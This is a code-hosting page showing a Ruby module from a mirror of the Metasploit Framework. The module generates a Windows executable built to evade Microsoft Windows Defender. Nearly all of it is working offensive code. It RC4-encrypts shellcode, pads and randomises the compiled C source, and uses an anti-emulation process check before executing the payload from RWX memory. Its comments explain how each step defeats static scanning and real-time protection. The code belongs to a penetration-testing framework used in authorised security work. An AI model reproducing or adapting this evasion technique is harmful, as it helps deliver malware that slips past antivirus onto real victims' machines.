infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/modules/evasion/windows/windows_defender_exe.rb

81 lines
2.3 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/compiler/windows'
class MetasploitModule < Msf::Evasion
def initialize(info={})
super(merge_info(info,
'Name' => 'Microsoft Windows Defender Evasive Executable',
'Description' => %q{
This module allows you to generate a Windows EXE that evades against Microsoft
Windows Defender. Multiple techniques such as shellcode encryption, source code
obfuscation, Metasm, and anti-emulation are used to achieve this.
For best results, please try to use payloads that use a more secure channel
such as HTTPS or RC4 in order to avoid the payload network traffic getting
caught by antivirus better.
},
'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' => [ ['Microsoft Windows', {}] ]
))
end
def rc4_key
@rc4_key ||= Rex::Text.rand_text_alpha(32..64)
end
def get_payload
@c_payload ||= lambda {
opts = { format: 'rc4', key: rc4_key }
junk = Rex::Text.rand_text(10..1024)
p = payload.encoded + junk
return {
size: p.length,
c_format: Msf::Simple::Buffer.transform(p, 'c', 'buf', opts)
}
}.call
end
def c_template
@c_template ||= %Q|#include <Windows.h>
#include <rc4.h>
// The encrypted code allows us to get around static scanning
#{get_payload[:c_format]}
int main() {
int lpBufSize = sizeof(int) * #{get_payload[:size]};
LPVOID lpBuf = VirtualAlloc(NULL, lpBufSize, MEM_COMMIT, 0x00000040);
memset(lpBuf, '\\0', lpBufSize);
HANDLE proc = OpenProcess(0x1F0FFF, false, 4);
// Checking NULL allows us to get around Real-time protection
if (proc == NULL) {
RC4("#{rc4_key}", buf, (char*) lpBuf, #{get_payload[:size]});
void (*func)();
func = (void (*)()) lpBuf;
(void)(*func)();
}
return 0;
}|
end
def run
vprint_line c_template
# The randomized code allows us to generate a unique EXE
bin = Metasploit::Framework::Compiler::Windows.compile_random_c(c_template)
print_status("Compiled executable size: #{bin.length}")
file_create(bin)
end
end
Reference in New Issue View Git Blame Copy Permalink